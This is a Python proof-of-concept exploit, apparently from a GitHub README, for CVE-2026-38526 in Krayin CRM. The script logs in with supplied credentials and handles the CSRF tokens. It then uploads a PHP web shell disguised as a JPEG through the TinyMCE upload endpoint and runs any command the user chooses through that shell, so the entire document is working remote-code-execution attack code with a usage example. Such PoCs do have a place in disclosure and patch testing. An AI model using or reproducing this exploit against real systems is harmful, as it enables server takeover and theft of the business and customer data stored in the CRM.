README.md
Rendering markdown...
import requests
import urllib.parse
import argparse
import re
import subprocess
import sys
parser = argparse.ArgumentParser(
description="CVE-2026-38526 PoC - Krayin CRM RCE",
formatter_class=argparse.RawTextHelpFormatter,
epilog="Example:\n python3 exploit.py -t http://krayin.example.com -u [email protected] -p password123 -c id\n\nNote: Do not include a trailing slash in the URL."
)
parser.add_argument("-t", required=True, help="Target URL (e.g. http://krayin.example.com)")
parser.add_argument("-u", required=True, help="Username/email")
parser.add_argument("-p", required=True, help="Password")
parser.add_argument("-c", required=True, help="Command to execute")
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
TARGET = args.t.rstrip("/")
session = requests.Session()
r = session.get(f"{TARGET}/admin/login")
token_match = re.search(r'name="_token"\s+value="([^"]+)"', r.text)
form_token = token_match.group(1)
xsrf = urllib.parse.unquote(session.cookies.get("XSRF-TOKEN"))
r = session.post(f"{TARGET}/admin/login",
json={"_token": form_token, "email": args.u, "password": args.p},
headers={
"X-XSRF-TOKEN": xsrf,
"Referer": f"{TARGET}/admin/login",
"Accept": "application/json",
"X-Requested-With": "XMLHttpRequest",
}
)
xsrf = urllib.parse.unquote(session.cookies.get("XSRF-TOKEN"))
r = session.post(f"{TARGET}/admin/tinymce/upload",
files={"file": ("shell.php", b"<?php system($_GET['cmd']); ?>", "image/jpeg")},
headers={"X-XSRF-TOKEN": xsrf}
)
location = r.json().get("location")
if location:
url = f"{location}?cmd={urllib.parse.quote(args.c)}"
result = subprocess.run(["curl", "-s", url], capture_output=True, text=True)
print(result.stdout)
else:
print(f"[-] Upload failed: {r.status_code}")